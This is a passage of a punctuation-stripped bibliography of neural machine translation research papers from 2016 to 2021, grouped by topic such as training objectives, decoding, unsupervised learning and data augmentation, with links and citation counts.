alexander fraser 2020 towards reasonably sized character level transformer nmt by finetuning subword systems https www aclweb org anthology 2020 emnlp main 203 in proceedings of emnlp 2020 h3 id training training objectives and frameworks h3 marc aurelio ranzato sumit chopra michael auli and wojciech zaremba 2016 sequence level training with recurrent neural networks https arxiv org pdf 1511 06732 in proceedings of iclr 2016 citation https scholar google com hk scholar cites 4877899442083611721 as sdt 2005 sciodt 0 5 hl en 373 minh thang luong quoc v le ilya sutskever oriol vinyals and lukasz kaiser 2016 multi task sequence to sequence learning https arxiv org pdf 1511 06114 in proceedings of iclr 2016 citation https scholar google com hk scholar cites 6045967109711129604 as sdt 2005 sciodt 0 5 hl en 282 shiqi shen yong cheng zhongjun he wei he hua wu maosong sun and yang liu 2016 minimum risk training for neural machine translation http aclweb org anthology p16 1159 in proceedings of acl 2016 citation https scholar google com hk scholar cites 13568140432319924245 as sdt 2005 sciodt 0 5 hl en 184 sam wiseman and alexander m rush 2016 sequence to sequence learning as beam search optimization http aclweb org anthology d16 1137 in proceedings of emnlp 2016 citation https scholar google com hk scholar cites 8919612243620131744 as sdt 2005 sciodt 0 5 hl en 141 di he yingce xia tao qin liwei wang nenghai yu tie yan liu wei ying ma 2016 dual learning for machine translation https papers nips cc paper 6469 dual learning for machine translation pdf in proceedings of nips 2016 citation https scholar google com hk scholar cites 15841765927830550600 as sdt 2005 sciodt 0 5 hl en 138 dzmitry bahdanau philemon brakel kelvin xu anirudh goyal ryan lowe joelle pineau aaron courville and yoshua bengio 2017 an actor critic algorithm for sequence prediction https arxiv org pdf 1607 07086 in proceedings of iclr 2017 citation https scholar google com hk scholar cites 5228204938243984917 as sdt 2005 sciodt 0 5 hl en 167 julia kreutzer artem sokolov stefan riezler 2017 bandit structured prediction for neural sequence to sequence learning http aclweb org anthology p17 1138 in proceedings of acl 2017 citation https scholar google com scholar oi bibs hl en cites 2303245646235792457 8131913197545815057 11 yingce xia tao qin wei chen jiang bian nenghai yu and tie yan liu 2017 dual supervised learning https arxiv org pdf 1707 00415 pdf in proceedings of icml 2017 citation https scholar google com scholar um 1 ie utf 8 lr cites 17907972833117899731 29 yingce xia jiang bian tao qin nenghai yu and tie yan liu 2017 dual inference for machine learning https www ijcai org proceedings 2017 0434 pdf in proceedings of ijcai 2017 citation https scholar google com scholar um 1 ie utf 8 lr cites 15405750739898389436 9 di he hanqing lu yingce xia tao qin liwei wang and tieyan liu 2017 decoding with value networks for neural machine translation http papers nips cc paper 6622 decoding with value networks for neural machine translation pdf in proceedings of nips 2017 citation https scholar google com hk scholar cites 9924066051536654397 as sdt 2005 sciodt 0 5 hl en 11 sergey edunov myle ott michael auli david grangier and marc aurelio ranzato 2018 classical structured prediction losses for sequence to sequence learning http aclweb org anthology n18 1033 in proceedings of naacl 2018 citation https scholar google com hk scholar cites 7858632228846408271 as sdt 2005 sciodt 0 5 hl en 20 zihang dai qizhe xie and eduard hovy 2018 from credit assignment to entropy regularization two new algorithms for neural sequence prediction http aclweb org anthology p18 1155 in proceedings of acl 2018 citation https scholar google com hk scholar hl zh cn as sdt 0 5 sciodt 0 5 cites 73472736706758753 scipsc 1 zhen yang wei chen feng wang and bo xu 2018 improving neural machine translation with conditional sequence generative adversarial nets http aclweb org anthology n18 1122 in proceedings of naacl 2018 citation https scholar google com hk scholar cites 14312548252804187966 as sdt 2005 sciodt 0 5 hl en 43 kevin clark minh thang luong christopher d manning and quoc le 2018 semi supervised sequence modeling with cross view training http aclweb org anthology d18 1217 in proceedings of emnlp 2018 lijun wu fei tian tao qin jianhuang lai and tie yan liu 2018 a study of reinforcement learning for neural machine translation http aclweb org anthology d18 1397 in proceedings of emnlp 2018 citation https scholar google com hk scholar cites 9706797919793848294 as sdt 2005 sciodt 0 5 hl en 2 semih yavuz chung cheng chiu patrick nguyen and yonghui wu 2018 calcs continuously approximating longest common subsequence for sequence level optimization http aclweb org anthology d18 1406 in proceedings of emnlp 2018 lijun wu fei tian yingce xia yang fan tao qin jianhuang lai and tie yan liu 2018 learning to teach with dynamic loss functions https papers nips cc paper 7882 learning to teach with dynamic loss functions pdf in proceedings of neurips 2018 yiren wang yingce xia tianyu he fei tian tao qin chengxiang zhai and tie yan liu 2019 multi agent dual learning https openreview net pdf id hyghn2a5tm in proceedings of iclr 2019 liqun chen yizhe zhang ruiyi zhang chenyang tao zhe gan haichao zhang bai li dinghan shen changyou chen and lawrence carin 2019 improving sequence to sequence learning via optimal transport https openreview net pdf id s1xtajr5tx in proceedings of iclr 2019 sachin kumar and yulia tsvetkov 2019 von mises fisher loss for training sequence to sequence models with continuous outputs https openreview net pdf id rjldnoa5y7 in proceedings of iclr 2019 xing niu weijia xu and marine carpuat 2019 bi directional differentiable input reconstruction for low resource neural machine translation https arxiv org pdf 1811 01116 pdf in proceedings of naacl 2019 weijia xu xing niu and marine carpuat 2019 differentiable sampling with flexible reference word order for neural machine translation https arxiv org pdf 1904 04079 pdf in proceedings of naacl 2019 inigo jauregi unanue ehsan zare borzeshi nazanin esmaili and massimo piccardi rewe regressing word embeddings for regularization of neural machine translation systems https arxiv org pdf 1904 02461 pdf in proceedings of naacl 2019 reuben cohn gordon and noah goodman 2019 lost in machine translation a method to reduce meaning loss https arxiv org pdf 1902 09514 pdf in proceedings of naacl 2019 emmanouil antonios platanios otilia stretcu graham neubig barnabas poczos and tom m mitchell 2019 competence based curriculum learning for neural machine translation https arxiv org pdf 1903 09848 pdf in proceedings of naacl 2019 gaurav kumar george foster colin cherry and maxim krikun 2019 reinforcement learning based curriculum optimization for neural machine translation https arxiv org pdf 1903 00041 pdf in proceedings of naacl 2019 mitchell stern william chan jamie kiros jakob uszkoreit 2019 insertion transformer flexible sequence generation via insertion operations http proceedings mlr press v97 stern19a stern19a pdf in proceedings of icml 2019 laura jehl carolin lawrence and stefan riezler 2019 learning neural sequence to sequence models from weak feedback with bipolar ramp loss https arxiv org pdf 1907 03748 transactions of the association for computational linguistics motoki sato jun suzuki and shun kiyono 2019 effective adversarial regularization for neural machine translation https www aclweb org anthology p19 1020 in proceedings of acl 2019 kehai chen rui wang masao utiyama and eiichiro sumita 2019 neural machine translation with reordering embeddings https www aclweb org anthology p19 1174 in proceedings of acl 2019 bram bulte and arda tezcan 2019 neural fuzzy repair integrating fuzzy matches into neural machine translation https www aclweb org anthology p19 1175 in proceedings of acl 2019 mingming yang rui wang kehai chen masao utiyama eiichiro sumita min zhang and tiejun zhao 2019 sentence level agreement for neural machine translation https www aclweb org anthology p19 1296 in proceedings of acl 2019 wen zhang yang feng fandong meng di you and qun liu 2019 bridging the gap between training and inference for neural machine translation https www aclweb org anthology p19 1426 in proceedings of acl 2019 john wieting taylor berg kirkpatrick kevin gimpel and graham neubig 2019 beyond bleu training neural machine translation with semantic similarity https www aclweb org anthology p19 1427 in proceedings of acl 2019 zonghan yang yong cheng yang liu maosong sun 2019 reducing word omission errors in neural machine translation a contrastive learning approach https www aclweb org anthology p19 1623 in proceedings of acl 2019 kyra yee nathan ng yann n dauphin and michael auli 2019 simple and effective noisy channel modeling for neural machine translation https arxiv org pdf 1908 05731 in proceedings of emnlp 2019 sarthak garg stephan peitz udhyakumar nallasamy and matthias paulik 2019 jointly learning to align and translate with transformer models https arxiv org pdf 1909 02074 in proceedings of emnlp 2019 tianchi bi hao xiong zhongjun he hua wu and haifeng wang 2019 multi agent learning for neural machine translation https www aclweb org anthology d19 1079 pdf in proceedings of emnlp 2019 zaixiang zheng shujian huang zhaopeng tu xin yu dai and jiajun chen 2019 dynamic past and future for neural machine translation https www aclweb org anthology d19 1086 in proceedings of emnlp 2019 yiren wang yingce xia fei tian fei gao tao qin cheng xiang zhai tie yan liu 2019 neural machine translation with soft prototype https papers nips cc paper 8861 neural machine translation with soft prototype in proceedings of neurips 2019 mingjun zhao haijiang wu di niu and xiaoli wang 2020 reinforced curriculum learning on pre trained neural machine translation models https sites ualberta ca dniu homepage publications files aaai zhaom 7640 pdf in proceedings of aaai 2020 yang feng wanying xie shuhao gu chenze shao wen zhang zhengxin yang and dong yu 2020 modeling fluency and faithfulness for diverse neural machine translation https arxiv org abs 1912 00178 in proceedings of aaai 2020 leshem choshen lior fox zohar aizenbud omri abend 2020 on the weaknesses of reinforcement learning for neural machine translation https openreview net forum id h1ecw3ekvh in proceedings of iclr 2020 zaixiang zheng hao zhou shujian huang lei li xin yu dai jiajun chen 2020 mirror generative neural machine translation https openreview net forum id hkxqrtnyph in proceedings of iclr 2020 angela fan edouard grave armand joulin 2020 reducing transformer depth on demand with structured dropout https openreview net forum id sylo2ystdr in proceedings of iclr 2020 yikai zhou baosong yang derek f wong yu wan and lidia s chao 2020 uncertainty aware curriculum learning for neural machine translation https arxiv org abs 1903 09848 in proceedings of acl 2020 hongfei xu josef van genabith deyi xiong and qiuhui liu 2020 dynamically adjusting transformer batch size by monitoring gradient direction change https arxiv org abs 2005 02008 in proceedings of acl 2020 hongfei xu qiuhui liu josef van genabith deyi xiong and jingyi zhang 2020 lipschitz constrained parameter initialization for deep transformers https arxiv org abs 1911 03179 in proceedings of acl 2020 xintong li lemao liu rui wang guoping huang and max meng 2020 regularized context gates on transformer for machine translation https arxiv org abs 1908 11020 in proceedings of acl 2020 sheng shen zhewei yao amir gholami michael mahoney and kurt keutzer 2020 rethinking batch normalization in transformers https arxiv org abs 2003 07845 in proceedings of icml 2020 xuebo liu houtim lai derek f wong lidia s chao 2020 norm based curriculum learning for neural machine translation https www aclweb org anthology 2020 acl main 41 in proceedings of acl 2020 rongxiang weng heng yu xiangpeng wei weihua luo 2020 towards enhancing faithfulness for neural machine translation https www aclweb org anthology 2020 emnlp main 212 in proceedings of emnlp 2020 yu wan baosong yang derek f wong yikai zhou lidia s chao haibo zhang boxing chen 2020 self paced learning for neural machine translation https www aclweb org anthology 2020 emnlp main 80 in proceedings of emnlp 2020 wenxiang jiao xing wang shilin he irwin king michael lyu zhaopeng tu 2020 data rejuvenation exploiting inactive training examples for neural machine translation https www aclweb org anthology 2020 emnlp main 176 in proceedings of emnlp 2020 shuhao gu jinchao zhang fandong meng yang feng wanying xie jie zhou dong yu 2020 token level adaptive training for neural machine translation https www aclweb org anthology 2020 emnlp main 76 in proceedings of emnlp 2020 xiao pan mingxuan wang liwei wu lei li 2021 contrastive learning for many to many multilingual neural machine translation https aclanthology org 2021 acl long 21 in proceedings of acl 2021 zehui lin liwei wu mingxuan wang lei li 2021 learning language specific sub netswork for multilingual machine translation https aclanthology org 2021 acl long 25 pdf in proceedings of acl 2021 h3 id decoding decoding h3 mingxuan wang zhengdong lu hang li and qun liu 2016 memory enhanced decoder for neural machine translation http aclweb org anthology d16 1027 in proceedings of emnlp 2016 citation https scholar google com hk scholar cites 8953099567327192144 as sdt 5 43 sciodt 0 43 hl en 30 shonosuke ishiwatari jingtao yao shujie liu mu li ming zhou naoki yoshinaga masaru kitsuregawa and weijia jia 2017 chunk based decoder for neural machine translation http aclweb org anthology p17 1174 in proceedings of acl 2017 citation https scholar google com hk scholar cites 12622466792413888553 as sdt 5 43 sciodt 0 43 hl en 4 hao zhou zhaopeng tu shujian huang xiaohua liu hang li and jiajun chen 2017 chunk based bi scale decoder for neural machine translation http aclweb org anthology p17 2092 in proceedings of acl 2017 citation https scholar google com hk scholar cites 15037334213705032139 as sdt 5 43 sciodt 0 43 hl en 6 zichao yang zhiting hu yuntian deng chris dyer and alex smola 2017 neural machine translation with recurrent attention modeling http aclweb org anthology e17 2061 in proceedings of eacl 2017 citation https scholar google com hk scholar cites 5621977008323303060 as sdt 5 43 sciodt 0 43 hl en 25 markus freitag and yaser al onaizan 2017 beam search strategies for neural machine translation http aclweb org anthology w17 3207 in proceedings of the first workshop on neural machine translation citation https scholar google com hk scholar cites 9963996198070293328 as sdt 5 43 sciodt 0 43 hl en 14 rajen chatterjee matteo negri marco turchi marcello federico lucia specia and fr d ric blain 2017 guiding neural machine translation decoding with external knowledge http aclweb org anthology w17 4716 in proceedings of the second conference on machine translation citation https scholar google com hk scholar cites 16027327382881304751 as sdt 5 43 sciodt 0 43 hl en 8 cong duy vu hoang gholamreza haffari and trevor cohn 2017 towards decoding as continuous optimisation in neural machine translation http aclweb org anthology d17 1014 in proceedings of emnlp 2017 citation https scholar google com hk scholar cites 3256665477810901088 as sdt 5 43 sciodt 0 43 hl en 4 yin wen chang and michael collins 2017 source side left to right or target side left to right an empirical comparison of two phrase based decoding algorithms http aclweb org anthology d17 1157 in proceedings of emnlp 2017 jiatao gu kyunghyun cho and victor o k li 2017 trainable greedy decoding for neural machine translation http aclweb org anthology d17 1210 in proceedings of emnlp 2017 citation https scholar google com hk scholar cites 8731447567218149379 as sdt 2005 sciodt 0 5 hl en 18 huda khayrallah gaurav kumar kevin duh matt post and philipp koehn 2017 neural lattice search for domain adaptation in machine translation http www aclweb org anthology i17 2004 in proceedings of ijcnlp 2017 citation https scholar google com hk scholar cluster 1478484647323458623 hl zh cn as sdt 0 5 4 ukasz kaiser aurko roy ashish vaswani niki parmar samy bengio jakob uszkoreit and noam shazeer 2018 fast decoding in sequence models using discrete latent variables https arxiv org pdf 1803 03382 pdf in proceedings of icml 2018 citation https scholar google com scholar cites 4042994175439965815 as sdt 2005 sciodt 0 5 hl en 3 xiangwen zhang jinsong su yue qin yang liu rongrong ji and hongji wang 2018 asynchronous bidirectional decoding for neural machine translation https arxiv org pdf 1801 05122 in proceedings of aaai 2018 citation https scholar google com hk scholar cites 8717464809531813198 as sdt 2005 sciodt 0 5 hl en 10 jiatao gu daniel jiwoong im and victor o k li 2018 neural machine translation with gumbel greedy decoding https www aaai org ocs index php aaai aaai18 paper view 17299 16059 in proceedings of aaai 2018 citation https scholar google com scholar cites 13306026917760415053 as sdt 2005 sciodt 0 5 hl en 5 philip schulz wilker aziz and trevor cohn 2018 a stochastic decoder for neural machine translation http aclweb org anthology p18 1115 in proceedings of acl 2018 citation https scholar google com hk scholar cites 2090499795836532737 as sdt 2005 sciodt 0 5 hl en 3 raphael shu and hideki nakayama 2018 improving beam search by removing monotonic constraint for neural machine translation http aclweb org anthology p18 2054 in proceedings of acl 2018 junyang lin xu sun xuancheng ren shuming ma jinsong su and qi su 2018 deconvolution based global decoding for neural machine translation http aclweb org anthology c18 1276 in proceedings of coling 2018 citation https scholar google com hk scholar cites 7984371866238647123 as sdt 2005 sciodt 0 5 hl en 2 chunqi wang ji zhang and haiqing chen 2018 semi autoregressive neural machine translation http aclweb org anthology d18 1044 in proceedings of emnlp 2018 xinwei geng xiaocheng feng bing qin and ting liu 2018 adaptive multi pass decoder for neural machine translation http aclweb org anthology d18 1048 in proceedings of emnlp 2018 wen zhang liang huang yang feng lei shen and qun liu 2018 speeding up neural machine translation decoding by cube pruning http aclweb org anthology d18 1460 in proceedings of emnlp 2018 xinyi wang hieu pham pengcheng yin and graham neubig 2018 a tree based decoder for neural machine translation http aclweb org anthology d18 1509 in proceedings of emnlp 2018 citation https scholar google com hk scholar cites 9083843868999368969 as sdt 2005 sciodt 0 5 hl en 1 chenze shao xilin chen and yang feng 2018 greedy search with probabilistic n gram matching for neural machine translation http aclweb org anthology d18 1510 in proceedings of emnlp 2018 zhisong zhang rui wang masao utiyama eiichiro sumita and hai zhao 2018 exploring recombination for efficient decoding of neural machine translation http aclweb org anthology d18 1511 in proceedings of emnlp 2018 jetic g hassan s shavarani and anoop sarkar 2018 top down tree structured decoding with syntactic connections for neural machine translation and parsing http aclweb org anthology d18 1037 in proceedings of emnlp 2018 yilin yang liang huang and mingbo ma 2018 breaking the beam search curse a study of re scoring methods and stopping criteria for neural machine translation http aclweb org anthology d18 1342 in proceedings of emnlp 2018 citation https scholar google com hk scholar cites 7003078853740771503 as sdt 2005 sciodt 0 5 hl en 3 yun chen victor o k li kyunghyun cho and samuel r bowman 2018 a stable and effective learning strategy for trainable greedy decoding http aclweb org anthology d18 1035 in proceedings of emnlp 2018 wouter kool herke van hoof and max welling 2019 stochastic beams and where to find them the gumbel top k trick for sampling sequences without replacement http proceedings mlr press v97 kool19a kool19a pdf in proceedings of icml 2019 ashwin kalyan peter anderson stefan lee and dhruv batra 2019 trainable decoding of sets of sequences for neural sequence models http proceedings mlr press v97 kalyan19a kalyan19a pdf in proceedings of icml 2019 eldan cohen and christopher beck 2019 empirical analysis of beam search performance degradation in neural sequence models http proceedings mlr press v97 cohen19a cohen19a pdf in proceedings of icml 2019 kartik goyal chris dyer and taylor berg kirkpatrick 2019 an empirical investigation of global and local normalization for recurrent neural sequence models using a continuous relaxation to beam search https arxiv org pdf 1904 06834 pdf in proceedings of naacl 2019 mingbo ma renjie zheng and liang huang 2019 learning to stop in structured prediction for neural machine translation https arxiv org pdf 1904 01032 pdf in proceedings of naacl 2019 han fu chenghao liu and jianling sun 2019 reference network for neural machine translation https www aclweb org anthology p19 1287 in proceedings of acl 2019 long zhou jiajun zhang and chengqing zong 2019 synchronous bidirectional neural machine translation https www mitpressjournals org doi pdf 10 1162 tacl a 00256 transactions of the association for computational linguistics zhiqing sun zhuohan li haoqing wang zi lin di he and zhi hong deng 2019 fast structured decoding for sequence models https arxiv org pdf 1910 11555 in proceedings of neurips 2019 lifu tu richard yuanzhe pang sam wiseman and kevin gimpel 2020 engine energy based inference networks for non autoregressive machine translation http arxiv org abs 2005 00850 in proceedings of acl 2020 pinzhen chen nikolay bogoychev kenneth heafield and faheem kirefu 2020 parallel sentence mining by constrained decoding https www aclweb org anthology 2020 acl main 152 in proceedings of acl 2020 julia kreutzer george foster colin cherry 2020 inference strategies for machine translation with conditional masking https www aclweb org anthology 2020 emnlp main 465 in proceedings of emnlp 2020 yuntian deng alexander rush 2020 cascaded text generation with markov transformers https papers nips cc paper 2020 file 01a0683665f38d8e5e567b3b15ca98bf paper pdf in proceedings of neurips 2020 clara meister ryan cotterell tim vieira 2020 if beam search is the answer what was the question https www aclweb org anthology 2020 emnlp main 170 in proceedings of emnlp 2020 urvashi khandelwal angela fan dan jurafsky luke zettlemoyer mike lewis 2021 nearest neighbor machine translation https openreview net pdf id 7wcbofj8hjm in proceedings of iclr 2021 mathias muller rico sennrich 2021 understanding the properties of minimum bayes risk decoding in neural machine translation https aclanthology org 2021 acl long 22 in proceedings of acl 2021 hongfei xu qiuhui liu josef van genabith deyi xiong meng zhang 2021 multi head highly parallelized lstm decoder for neural machine translation https aclanthology org 2021 acl long 23 in proceedings of acl 2021 yang feng shuhao gu dengji guo zhengxin yang chenze shao 2021 guiding teacher forcing with seer forcing for neural machine translation https aclanthology org 2021 acl long 223 pdf in proceedings of acl 2021 h3 id low resource language translation low resource language translation h3 rico sennrich and biao zhang 2019 revisiting low resource neural machine translation a case study https arxiv org pdf 1905 11901 in proceedings of acl 2019 danni liu jan niehues james cross francisco guzman xian li 2021 improving zero shot translation by disentangling positional information https aclanthology org 2021 acl long 101 pdf in proceedings of acl 2021 h4 id semi supervised semi supervised learning h4 rico sennrich barry haddow and alexandra birch 2016 improving neural machine translation models with monolingual data https arxiv org pdf 1511 06709 in proceedings of acl 2016 citation https scholar google com hk scholar cites 16647011114557315277 as sdt 2005 sciodt 0 5 hl en 220 yong cheng wei xu zhongjun he wei he hua wu maosong sun and yang liu 2016 semi supervised learning for neural machine translation http aclweb org anthology p16 1185 in proceedings of acl 2016 citation https scholar google com hk scholar cites 4238720597816763796 as sdt 2005 sciodt 0 5 hl en 59 tobias domhan and felix hieber 2017 using target side monolingual data for neural machine translation through multi task learning http aclweb org anthology d17 1158 in proceedings of emnlp 2017 citation https scholar google com hk scholar cites 3638267208501348823 as sdt 2005 sciodt 0 5 hl en 11 anna currey antonio valerio miceli barone and kenneth heafield 2017 copied monolingual data improves low resource neural machine translation http aclweb org anthology w17 4715 in proceedings of the second conference on machine translation citation https scholar google com hk scholar cites 5102771697654796737 as sdt 2005 sciodt 0 5 hl en 14 shuo wang yang liu chao wang huanbo luan and maosong sun 2019 improving back translation with uncertainty based confidence estimation https arxiv org pdf 1909 00157 in proceedings of emnlp 2019 zaixiang zheng hao zhou shujian huang lei li xin yu dai jiajun chen 2020 mirror generative neural machine translation https openreview net forum id hkxqrtnyph in proceedings of iclr 2020 h4 id unsupervised unsupervised learning h4 nima pourdamghani and kevin knight 2017 deciphering related languages http aclweb org anthology d17 1266 in proceedings of emnlp 2017 citation https scholar google com hk scholar cites 1168382888604094286 as sdt 2005 sciodt 0 5 hl en 5 mikel artetxe gorka labaka eneko agirre and kyunghyun cho 2018 unsupervised neural machine translation https openreview net pdf id sy2ogebaw in proceedings of iclr 2018 citation https scholar google com hk scholar cites 6109181985493123662 as sdt 2005 sciodt 0 5 hl en 78 guillaume lample alexis conneau ludovic denoyer and marc aurelio ranzato 2018 unsupervised machine translation using monolingual corpora only https openreview net pdf id rkyttf az in proceedings of iclr 2018 citation https scholar google com hk scholar cites 682955820897938264 as sdt 2005 sciodt 0 5 hl en 78 zhen yang wei chen feng wang and bo xu 2018 unsupervised neural machine translation with weight sharing http aclweb org anthology p18 1005 in proceedings of acl 2018 citation https scholar google com hk scholar cites 16608767535553803928 as sdt 2005 sciodt 0 5 hl en 6 guillaume lample myle ott alexis conneau ludovic denoyer and marc aurelio ranzato 2018 phrase based neural unsupervised machine translation http aclweb org anthology d18 1549 in proceedings of emnlp 2018 citation https scholar google com hk scholar cites 17725098892021008539 as sdt 2005 sciodt 0 5 hl en 24 iftekhar naim parker riley and daniel gildea 2018 feature based decipherment for machine translation http aclweb org anthology j18 3006 computational linguistics citation https scholar google com hk scholar cites 17725098892021008539 as sdt 2005 sciodt 0 5 hl en 24 jiawei wu xin wang and william yang wang 2019 extract and edit an alternative to back translation for unsupervised neural machine translation https arxiv org pdf 1904 02331 pdf in proceedings of naacl 2019 nima pourdamghani nada aldarrab marjan ghazvininejad kevin knight and jonathan may 2019 translating translationese a two step approach to unsupervised machine translation https arxiv org pdf 1906 05683 in proceedings of acl 2019 jiaming luo yuan cao and regina barzilay 2019 neural decipherment via minimum cost flow from ugaritic to linear b https arxiv org pdf 1906 06718 in proceedings of acl 2019 yichong leng xu tan tao qin xiang yang li and tie yan liu 2019 unsupervised pivot translation for distant languages https www aclweb org anthology p19 1017 in proceedings of acl 2019 mikel artetxe gorka labaka and eneko agirre 2019 an effective approach to unsupervised machine translation https www aclweb org anthology p19 1019 in proceedings of acl 2019 viktor hangya and alexander fraser 2019 unsupervised parallel sentence extraction with parallel segment detection helps machine translation https www aclweb org anthology p19 1119 in proceedings of acl 2019 haipeng sun rui wang kehai chen masao utiyama eiichiro sumita and tiejun zhao 2019 unsupervised bilingual word embedding agreement for unsupervised neural machine translation https www aclweb org anthology p19 1119 in proceedings of acl 2019 jiatao gu yong wang kyunghyun cho and victor o k li 2019 improved zero shot neural machine translation via ignoring spurious correlations https www aclweb org anthology p19 1121 in proceedings of acl 2019 sukanta sen kamal kumar gupta asif ekbal and pushpak bhattacharyya 2019 multilingual unsupervised nmt using shared encoder and language specific decoders https www aclweb org anthology p19 1297 in proceedings of acl 2019 shuo ren yu wu shujie liu ming zhou and shuai ma 2019 explicit cross lingual pre training for unsupervised machine translation https www aclweb org anthology d19 1071 pdf in proceedings of emnlp 2019 haipeng sun rui wang kehai chen masao utiyama eiichiro sumita and tiejun zhao 2020 knowledge distillation for multilingual unsupervised neural machine translation https arxiv org abs 2004 10171 in proceedings of acl 2020 xiangyu duan baijun ji hao jia min tan min zhang boxing chen weihua luo and yue zhang 2020 bilingual dictionary based neural machine translation without using parallel sentences https www aclweb org anthology 2020 acl main 143 in proceedings of acl 2020 shuo ren yu wu shujie liu ming zhou and shuai ma 2020 a retrieve and rewrite initialization method for unsupervised machine translation https www aclweb org anthology 2020 acl main 320 in proceedings of acl 2020 alexandra chronopoulou dario stojanovski alexander fraser 2020 reusing a pretrained language model on languages with limited corpora for unsupervised nmt https www aclweb org anthology 2020 emnlp main 214 in proceedings of emnlp 2020 jerin philip alexandre berard matthias gall laurent besacier 2020 monolingual adapters for zero shot neural machine translation https www aclweb org anthology 2020 emnlp main 361 in proceedings of emnlp 2020 dana ruiter josef van genabith cristina espa a bonet 2020 self induced curriculum learning in self supervised neural machine translation https www aclweb org anthology 2020 emnlp main 202 in proceedings of emnlp 2020 wei jen ko ahmed el kishky adithya renduchintala vishrav chaudhary naman goyal francisco guzman pascale fung philipp koehn mona diab 2021 adapting high resource nmt models to translate low resource related languages without parallel data https aclanthology org 2021 acl long 66 in proceedings of acl 2021 h4 id pivot based pivot based methods h4 orhan firat baskaran sankaran yaser al onaizan fatos t yarman vural and kyunghyun cho 2016 zero resource translation with multi lingual neural machine translation http aclweb org anthology d16 1026 in proceedings of emnlp 2016 citation https scholar google com scholar um 1 ie utf 8 lr cites 9699063558012530354 50 hao zheng yong cheng and yang liu 2017 maximum expected likelihood estimation for zero resource neural machine translation http nlp csai tsinghua edu cn ly papers ijcai2017 zh pdf in proceedings of ijcai 2017 citation https scholar google com scholar cites 8742684674953684271 as sdt 2005 sciodt 0 5 hl en 9 yong cheng qian yang yang liu maosong sun and wei xu 2017 joint training for pivot based neural machine translation http nlp csai tsinghua edu cn ly papers ijcai2017 cy pdf in proceedings of ijcai 2017 citation https scholar google com scholar cites 11174626133676084798 as sdt 2005 sciodt 0 5 hl en 11 yun chen yang liu yong cheng and victor o k li 2017 a teacher student framework for zero resource neural machine translation http aclweb org anthology p17 1176 in proceedings of acl 2017 citation https scholar google com scholar cites 13349008860652038472 as sdt 2005 sciodt 0 5 hl en 15 yun chen yang liu and victor o k li 2018 zero resource neural machine translation with multi agent communication game https arxiv org pdf 1802 03116 in proceedings of aaai 2018 citation https scholar google com scholar cites 13902575159717479954 as sdt 2005 sciodt 0 5 hl en 6 shuo ren wenhu chen shujie liu mu li ming zhou and shuai ma 2018 triangular architecture for rare language translation http aclweb org anthology p18 1006 in proceedings of acl 2018 citation https scholar google com scholar cites 10337098101101097173 as sdt 2005 sciodt 0 5 hl en 1 yunsu kim petre petrov pavel petrushkov shahram khadivi and hermann ney 2019 pivot based transfer learning for neural machine translation between non english languages https arxiv org pdf 1909 09524 in proceedings of emnlp 2019 h4 id data augmentation data augmentation methods h4 marzieh fadaee arianna bisazza and christof monz 2017 data augmentation for low resource neural machine translation http aclweb org anthology p17 2090 in proceedings of acl 2017 citation https scholar google com scholar cites 6141657859614474985 as sdt 2005 sciodt 0 5 hl en 26 marzieh fadaee and christof monz 2018 back translation sampling by targeting difficult words in neural machine translation http aclweb org anthology d18 1040 in proceedings of emnlp 2018 sergey edunov myle ott michael auli and david grangier 2018 understanding back translation at scale http aclweb org anthology d18 1045 in proceedings of emnlp 2018 citation https scholar google com scholar cites 5388849145974890035 as sdt 2005 sciodt 0 5 hl en 6 xinyi wang hieu pham zihang dai and graham neubig 2018 switchout an efficient data augmentation algorithm for neural machine translation http aclweb org anthology d18 1100 in proceedings of emnlp 2018 citation https scholar google com scholar cites 3839046500027819595 as sdt 2005 sciodt 0 5 hl en 4 mengzhou xia xiang kong antonios anastasopoulos and graham neubig 2019 generalized data augmentation for low resource translation https arxiv org pdf 1906 03785 in proceedings of acl 2019 jinhua zhu fei gao lijun wu yingce xia tao qin wengang zhou xueqi cheng and tie yan liu 2019 soft contextual data augmentation for neural machine translation https arxiv org pdf 1905 10523 in proceedings of acl 2019 chunting zhou xuezhe ma junjie hu and graham neubig 2019 handling syntactic divergence in low resource machine translation https arxiv org pdf 1909 00040 in proceedings of emnlp 2019 yuanpeng li liang zhao jianyu wang and joel hestness 2019 compositional generalization for primitive substitutions https arxiv org pdf 1910 02612 in proceedings of emnlp 2019 guanlin li lemao liu guoping huang conghui zhu and tiejun zhao 2019 understanding data augmentation in neural machine translation two perspectives towards generalization https www aclweb org anthology d19 1570 in proceedings of emnlp 2019 sergey edunov myle ott marc aurelio ranzato and michael auli 2020 on the evaluation of machine translation systems trained with back translation https arxiv org abs 1908 05204 in proceedings of acl 2020 aditya siddhant ankur bapna yuan cao orhan firat mia chen sneha kudugunta naveen arivazhagan and yonghui wu 2020 leveraging monolingual data with self supervision for multilingual neural machine translation https arxiv org abs 2005 04816 in proceedings of acl 2020 jitao xu josep crego and jean senellart 2020 boosting neural machine translation with similar translations https www aclweb org anthology 2020 acl main 144 in proceedings of acl 2020 yong cheng lu jiang wolfgang macherey and jacob eisenstein 2020 advaug robust adversarial augmentation for neural machine translation https www aclweb org anthology 2020 acl main 529 in proceedings of acl 2020 benjamin marie raphael rubino and atsushi fujita 2020 tagged back translation revisited why does it really work https www aclweb org anthology 2020 acl main 532 in proceedings of acl 2020 huda khayrallah brian thompson matt post philipp koehn 2020 simulated multiple reference training improves low resource machine translation https www aclweb org anthology 2020 emnlp main 7 in proceedings of emnlp 2020 hao ran wei zhirui zhang boxing chen weihua luo 2020 iterative domain repaired back translation https www aclweb org anthology 2020 emnlp main 474 in proceedings of emnlp 2020 xuan phi nguyen shafiq joty kui wu ai ti aw 2020 data diversification a simple strategy for neural machine translation https papers nips cc paper 2020 file 7221e5c8ec6b08ef6d3f9ff3ce6eb1d1 paper pdf in proceedings of neurips 2020 christos baziotis barry haddow alexandra birch 2020 language model prior for low resource neural machine translation https www aclweb org anthology 2020 emnlp main 615 in proceedings of emnlp 2020 hieu pham xinyi wang yiming yang graham neubig 2021 meta back translation https openreview net pdf id 3jjmdp7hha in proceedings of iclr 2021 m saiful bari tasnim mohiuddin and shafiq joty 2021 uxla a robust unsupervised data augmentation framework for zero resource cross lingual nlp https aclanthology org 2021 acl long 154 pdf in proceedings of acl 2021 h4 id data selection data selection methods h4 marlies van der wees arianna bisazza and christof monz 2017 dynamic data selection for neural machine translation http aclweb org anthology d17 1147 in proceedings of emnlp 2017 citation https scholar google com com scholar cites 2308754825624963103 as sdt 2005 sciodt 0 5 hl en 16 wei wang taro watanabe macduff hughes tetsuji nakagawa and ciprian chelba 2018 denoising neural machine 